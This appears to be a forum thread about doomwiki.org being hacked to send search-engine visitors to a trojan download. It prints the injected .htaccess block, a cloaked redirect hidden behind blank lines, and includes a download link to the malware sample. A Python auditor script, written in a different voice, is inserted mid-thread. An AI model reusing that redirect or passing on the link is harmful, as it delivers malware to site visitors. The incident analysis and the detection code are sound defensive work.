betabox

doomwiki has a virus?


Can someone confirm if doomwiki.org is infected?

Yesterday, I went to it via google and noticed a sort of redirection to "bankingonbankers" and java was started up. Did a malware scan follow-up.

I tried to reproduce, but couldn't. However, some guys from a tech support IRC said that when they went to doomwiki.org, there was an attempted download of some google_org_doomwiki.zip

Virustotal indicates it's malware. Maybe there's some malicious script?


You really should run a scan and then check for the same result on other pc's before you start scaring people
I was on the wiki only yesterday and I found nothing :/


Upgrade your Java JRE: there's a recent well-known vulnerability that enables arbitrary code execution through a malicious Java applet. If you see Java starting for no obvious reason on a page that SHOULDN'T have it at all, shut down the browser and kill the java process ASAP. I know for sure it affects releases prior to 1.6u29, while 1.7 should be fine.

On the bright side, this method is only used to deliver .exe files, so on Linux even if the download succeeds, it will be asymptomatic.


Where was I before the forums crashed - better not be anything to do with your malware! (JK)

That's not doomwiki.org, it's a fake link. The one I tried (which should have taken me here) is actually a download link for a file called "google_doomwiki.zip" from californiagoldbook.com and contained a variant of the Win32/Kryptic.ZWP trojan (as reported by ESET Smart Security).

Californiagoldbook.com redirects to another site called banknews.com who are flogging an e-book on a third site called californiagoldbookonline.com. I wouldn't be surprised if that e-book's infested with malware.

The moral of the story is - don't take Google links at face value.


I too got a suspicious zip file when trying to follow a link to the wiki from Google. The file downloaded was "google_.zip" and contained a "google_.com". Obviously I didn't run the program, but when I clicked the URL again, it took me straight to the site. Nothing weird happened with Java though...

Here is the link to the file I downloaded if anyone wants to examine it. Please be cautious: http://speedy.sh/tuYKn/google.zip

petePESTILENCE said:

You really should run a scan and then check for the same result on other pc's before you start scaring people
I was on the wiki only yesterday and I found nothing :/


Hi there! Good to see you didn't read my post. I already did scans of my PC and I've asked at a tech support IRC about this. Other people have encountered similar threats there. And no, much to your relief, this isn't a scare tactic.

Is the fake link displayed at the bottom of (whichever) browser when you hover the cursor over it on google? Or does it redirect AFTER clicking on the google result?

Anyway, it seems my Java version is up to date, but it's not 1.7; unless 1.6u31 is AKA 1.7


I clicked a couple google links to the wiki earlier when the thread was new & didn't have any problems.. just tried it again and got the same malicious redirect as you from 2 different ones, shut down by my browser & antivirus (though i'm gonna do some scans & monitor my processes/network activity closely) but afterwards the links worked properly.

edit: I was in a hurry to sever my connection & make double sure my comp is clean. posted about things I should probably research first.


Did not occur to me at all no matter how many times I tried.

Some info on that google_.com

google_.com: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
* Written with Microsoft Visual C++ 8.0, using C++/CLI.
* It is a GUI Application
* Calls DeleteCriticalSection, EnterCriticalSection, ExitProcess, FindResourceA, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetACP, GetCommandLineA, GetCommandLineW, GetCPInfo, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStrings, GetEnvironmentStringsW, GetFileType, GetLastError, GetLocaleInfoA, GetModuleFileNameA, GetModuleHandleA, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetStdHandle, GetStringTypeA, GetStringTypeW, GetSystemTimeAsFileTime, GetTickCount, GetVersionExA, HeapAlloc, HeapCreate, HeapDestroy, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSection, InterlockedDecrement, InterlockedIncrement, IsDebuggerPresent, IsValidCodePage, LCMapStringA, LCMapStringW, LeaveCriticalSection, LoadLibraryA, LoadResource, MultiByteToWideChar, QueryPerformanceCounter, RtlUnwind, SetHandleCount, SetLastError, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualFree, WideCharToMultiByte, and WriteFile


could this be due to a compromised .htaccess file at the doomwiki? That's probably the leading cause of traffic inbound from a search engine being redirected to some circle of hell... but web design & security is mostly voodoo to me, I just work on PCs.


Well, it only happens when you click on the link to doomwiki.org on Google, and it only happens once. And I guess gravager is right.
Whoever is the admin at Doomwiki.org should do a check on the .htaccess since it does that odd redirect.


I've done a Google search on "doom wiki", scrolled down until I found doomwiki.org and not doom.wikia.com, clicked on the link, nothing special happened.

EDIT: looking for "simon fraggle howard" as GreyGhost suggested, I found some results such as "pop.doomwiki.info". Oopsie. Be afraid, be very afraid.


well I saw it happen twice, & neither of them was the home page link. one of those pop.- links did it to me (I specifically tried it because it looked suspicious), but if I type the URL into my browser it loads the wiki page. I dunno what that prefix is all about. I avoided the crummy wikia site as well.

EDIT: ok my pop link didn't end with .info, now that smells like a fake. but typing pop.doomwiki.org in a browser just drops the pop & loads the home page for me.

anyway I sent a PM to Quasar earlier. not that I know anyone here but the wiki said he's a maintainer of the server =) he's probably sleeping like normal people though, so if somebody's in direct contact with an admin....

and I guess we can stop testing links to see if we get infected or not. enough lemmings have taken that dive to confirm the rocks down there are nasty.

gravager said:

could this be due to a compromised .htaccess file at the doomwiki?

Nothing to do with DoomWiki, it's a fake link that downloads a trojan to your PC, then (maybe, didn't for me) re-directs you to the Wiki.

printz said:

EDIT: looking for "simon fraggle howard" as GreyGhost suggested, I found some results such as "pop.doomwiki.info". Oopsie. Be afraid, be very afraid.

The Google link I used has disappeared, so maybe it's already being filtered out as a known malware site.

GreyGhost said:

Nothing to do with DoomWiki, it's a fake link that downloads a trojan to your PC, then (maybe, didn't for me) re-directs you to the Wiki.

Maybe your link didn't have a &redirect=no clause in the URL... I'm getting a pop.doomwiki result in the fifth find entry.


well this is just really confusing. if there's fake links, they're really good.

if I google doomwiki.org, the top link is to doomwiki.org, but that link sets off alarms.

more experimenting: it does this exactly once, then it keeps bringing me to doomwiki. but I restart my browser (clears all my cookies & cache) and it happens again.

I've got hella slow internet, so I took time to read the messages in the status bar. instead of "sending request to doomwiki.org" it redirects to "sending request to ####.kingoftheaquarium.com", that's 4 varying numbers up front. stopped loading before I received enough data to set off my antivirus. I close the tab and open the same link again, it takes me to Doomwiki. so I'm still thinking it could be the htaccess thing.


Looks to me like it's Google that's infected.

The way it operates, when you click a link, it actually sends you to a redirect. That way, it can count clicks and know which sites are accessed from which queries, and which type of searches you make, and all the rest of the Big Brotherian stuff. Then it uses JavaScript to hide the actual links in the status bar, and replace them with where they then redirect you.

For example, this:

DoomWiki.org, the new home of the Doom Wiki - Doom, Heretic ...
Welcome to the ultimate Doom Wiki, a community-driven project to document
everything related to id Software's classic games Doom and Doom II, as well as ...
doomwiki.org/ - Cached - Similar

The link says http://doomwiki.org/ when you hover over it. If you look at the source of the page, however, you'll see something different:

<li class="g">
 <h3 class="r">
  <a href="/url?q=http://doomwiki.org/&sa=U&
ei=LoRUT_GnM8HW0QXpw7jXBw&ved=0CBAQFjAA&
usg=AFQjCNFPoLR3C0p93WAu3Vxjfe5NuTveVw">
   <b>DoomWiki</b>.<b>org</b>, the new home of the Doom Wiki - Doom, Heretic <b>...</b>
  </a>
 </h3>
 <div class="s">Welcome to the ultimate <b>Doom Wiki</b>, a community-driven project to document <br>
 everything related to id Software's classic games Doom and Doom II, as well as <b>...</b><br>
  <div>
   <cite><b>doomwiki</b>.<b>org</b>/</cite>
   <span class="flc"> - 
    <a href="//webcache.googleusercontent.com/search?sclient=psy-ab&hl=en&site=&
btnK=&q=cache:Q8jS6IXZ_6UJ:http://doomwiki.org/+doomwiki.org&ct=clnk">Cached</a> - 
    <a href="/search?sclient=psy-ab&hl=en&site=&btnK=&tbo=1&
q=related:http://doomwiki.org/+doomwiki.org&sa=X">Similar</a>
   </span>
  </div>
 </div>
</li>


You may be right.

gravager said:

if i google doomwiki.org, the top link is to doomwiki.org, but that link sets off alarms.

more experimenting: it does this exactly once, then it keeps bringing me to doomwiki. but i restart my browser (clears all my cookies & cache) and it happens again.

Oddly enough, the first time I click on any Google link to DoomWiki (after clearing the browser cache and history) I'm taken to the browser's default home page. Not sure what's going on there.

Fortunately I took a screenshot first time around when ESET flagged the trojan, so maybe someone here can make more sense of the object URL than I have.

Gez said:

Looks to me like it's Google that's infected.

Did someone hack Google? Was it a protest?

EDIT: Does anyone know what malware files are automatically downloaded? I want to see if I have been infected.


Most likely the Russian Mafia seeking to grow their botnets, or Google have unofficially turned evil.

Gez said:

If you look at the source of the page


Soon that will be criminalized in one way or another.

Maes said:

Soon that will be criminalized in one way or another.


No chance, but I'm guessing someone will figure out an efficient way to obscure it.


It's the DoomWiki that has been infected, and it has most likely happened because we are still stuck on the obsolete 1.16.2 version of MediaWiki which is known to have at least one serious exploit.

This code has been injected into the .htaccess file, after about 300 pages of linebreaks:

<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(wordpress|twit|tweet|flickr\.|linkedin|google\.|yahoo\.|bing\.$
RewriteCond %{HTTP_REFERER}     !^.*(imgres\?q).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{HTTP_COOKIE}      !^.*xjV.*$ [NC]
RewriteCond %{HTTP_USER_AGENT}  .*Windows.* [NC]
RewriteCond %{HTTPS}            ^off$
RewriteRule ^(.*)$              http://%{REMOTE_PORT}.kingoftheaquarium.com/url?sa=X&source=web&cd=20&ved=0oHmRGpyT&url=ht$
</IfModule>
#1966ab4f167aa00d6a7a832bb0e5bacd5111a101acd601af7f78bde9
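For anyone who maintains a MediaWiki (or any Apache-hosted site) and wants to check their own .htaccess for the pattern quoted above, here is a small auditor. It is an added example, not code from this thread or from doomwiki.org. It looks for the three things that make that block what it is: a huge run of blank lines that pushes the payload out of sight, a RewriteRule whose target is an absolute URL on a host that is not yours, and RewriteCond gating on search-engine referers, a missing marker cookie and a Windows user agent. The sample .htaccess inside the script is constructed; its malicious block is a shortened copy of the one quoted in the thread, the `own_hosts` parameter, the `BLANK_RUN_THRESHOLD` value and the "two or more indicators" reporting rule are my own assumptions.

```python
"""Audit an Apache .htaccess file for an injected, cloaked redirect rule.

Added example (not from the thread or from doomwiki.org). The sample file is
constructed; its malicious block is shortened from the rule quoted above.
"""
import re
from urllib.parse import urlparse

SEARCH_ENGINES = ("google", "yahoo", "bing")
BLANK_RUN_THRESHOLD = 50  # assumption: no hand-written .htaccess pads this much

# Constructed sample: two ordinary MediaWiki-style rules, then the padding and
# the injected block (shortened from the one quoted in the thread).
SAMPLE_HTACCESS = (
    "RewriteEngine On\n"
    "RewriteRule ^wiki/(.*)$ /index.php?title=$1 [L,QSA]\n"
    "RewriteCond %{HTTP_HOST} ^www\\.doomwiki\\.org$ [NC]\n"
    "RewriteRule ^(.*)$ http://doomwiki.org/$1 [R=301,L]\n"
    + "\n" * 300 +
    "<IfModule prefork.c>\n"
    "RewriteEngine On\n"
    "RewriteCond %{REQUEST_METHOD}   ^GET$\n"
    "RewriteCond %{HTTP_REFERER}     ^(http\\:\\/\\/)?([^\\/\\?]*\\.)?(google\\.|yahoo\\.|bing\\.).*$ [NC]\n"
    "RewriteCond %{HTTP_USER_AGENT}  !^.*(bot|Crawl|curl|wget|Linux|Macintosh).*$ [NC]\n"
    "RewriteCond %{HTTP_COOKIE}      !^.*xjV.*$ [NC]\n"
    "RewriteCond %{HTTP_USER_AGENT}  .*Windows.* [NC]\n"
    "RewriteCond %{HTTPS}            ^off$\n"
    "RewriteRule ^(.*)$ http://%{REMOTE_PORT}.kingoftheaquarium.com/url?sa=X&source=web [R,L]\n"
    "</IfModule>\n"
)


def longest_blank_run(text):
    """Length of the longest run of consecutive empty or whitespace-only lines."""
    longest = run = 0
    for line in text.splitlines():
        if line.strip():
            run = 0
        else:
            run += 1
            longest = max(longest, run)
    return longest


def parse_rewrite_rules(text):
    """Group every RewriteRule with the RewriteCond lines that precede it.

    Returns dicts with the rule's line number, match pattern, substitution
    target and a list of (variable, pattern, flags) conditions.
    """
    rules, pending = [], []
    for number, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts:
            continue
        if parts[0] == "RewriteCond" and len(parts) >= 3:
            pending.append((parts[1], parts[2], parts[3] if len(parts) > 3 else ""))
        elif parts[0] == "RewriteRule" and len(parts) >= 3:
            rules.append({"line": number, "pattern": parts[1],
                          "target": parts[2], "conds": pending})
            pending = []  # RewriteCond lines only apply to the next RewriteRule
    return rules


def audit_rewrite_rule(rule, own_hosts):
    """Return the cloaking indicators present in one rule (empty if none)."""
    indicators = []
    target = rule["target"]
    if target.lower().startswith(("http://", "https://")):
        # Drop %{...} expansions (e.g. %{REMOTE_PORT}.) so the real host parses.
        host = urlparse(re.sub(r"%\{[^}]*\}\.?", "", target)).hostname or ""
        if host and not any(host == h or host.endswith("." + h) for h in own_hosts):
            indicators.append(f"redirect to external host {host}")
    for variable, pattern, _flags in rule["conds"]:
        lowered = pattern.lower()
        negated = pattern.startswith("!")
        if variable == "%{HTTP_REFERER}" and any(s in lowered for s in SEARCH_ENGINES):
            indicators.append("fires only for visitors arriving from a search engine")
        if variable == "%{HTTP_COOKIE}" and negated:
            indicators.append("fires only when a marker cookie is absent")
        if variable == "%{HTTP_USER_AGENT}" and "windows" in lowered and not negated:
            indicators.append("fires only for Windows user agents")
    return indicators


def audit_htaccess(text, own_hosts):
    """Return findings as {'line': int or None, 'indicators': [...]} dicts."""
    findings = []
    run = longest_blank_run(text)
    if run >= BLANK_RUN_THRESHOLD:
        findings.append({"line": None, "indicators":
                         [f"{run} consecutive blank lines hide content below the fold"]})
    for rule in parse_rewrite_rules(text):
        indicators = audit_rewrite_rule(rule, own_hosts)
        # A single indicator (e.g. a canonical-host redirect) is normal; an
        # external redirect that is also gated on referer/cookie/UA is cloaking.
        if len(indicators) >= 2:
            findings.append({"line": rule["line"], "indicators": indicators})
    return findings


if __name__ == "__main__":
    for finding in audit_htaccess(SAMPLE_HTACCESS, ("doomwiki.org",)):
        print(finding)
```

Run it against a real file with `audit_htaccess(open(".htaccess").read(), ("yourdomain.example",))`. Two details of the quoted rule are worth pointing out to the people who saw it fire: `%{REMOTE_PORT}` is the visitor's own source port, which is why the status bar showed four or five changing digits in front of kingoftheaquarium.com, and the `%{HTTP_COOKIE} !^.*xjV.*$` condition means the rule stops matching once a cookie containing `xjV` exists, which fits the reports of it happening only once per fresh browser session.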


boom! the old linebreak zerg trick.

anyway, speaking of google exploits, I read yesterday they were handing out $20-60k prizes for anyone who can mess with Chrome. I thought that could have backfired somehow... getting attention from the wrong people, etc


I think some of the advertisements may have viruses, because sometimes when I stay on a page on deviantART, my anti-virus software tells me that something harmful came up, and a rogue anti-virus would get on my computer, but I got it removed.

So yeah, whenever something comes up as a threat, I use a program to scan for any threats and remove them.


Why even bother at all with all this fancy-schmancy java(script) stuff anyway? The WWW works just fine with simply HTML+CSS, and no arbitrary code execution vectors. All this needless extra complexity only breeds security holes. KISS - you'll learn this lesson eventually the hard way, or you can learn now the easy way.

NitroactiveStudios said:

I think some of the advertisements may have viruses, because sometimes when I stay on a page on deviantART, my anti-virus software tells me that something harmful came up, and a rogue anti-virus would get on my computer, but I got it removed.

There are no ads on doomwiki.org.

The mess has been cleaned up, we're updating the source base and developing an action plan to prevent this from happening in the future.

hex11 said:

Why even bother at all with all this fancy-schmancy java(script) stuff anyway? The WWW works just fine with simply HTML+CSS, and no arbitrary code execution vectors. All this needless extra complexity only breeds security holes. KISS - you'll learn this lesson eventually the hard way, or you can learn now the easy way.

Tell me when you write a MediaWiki replacement that runs without any server-side scripting or server-side database, and is served off a vaporware web server that doesn't have server-side configuration files...
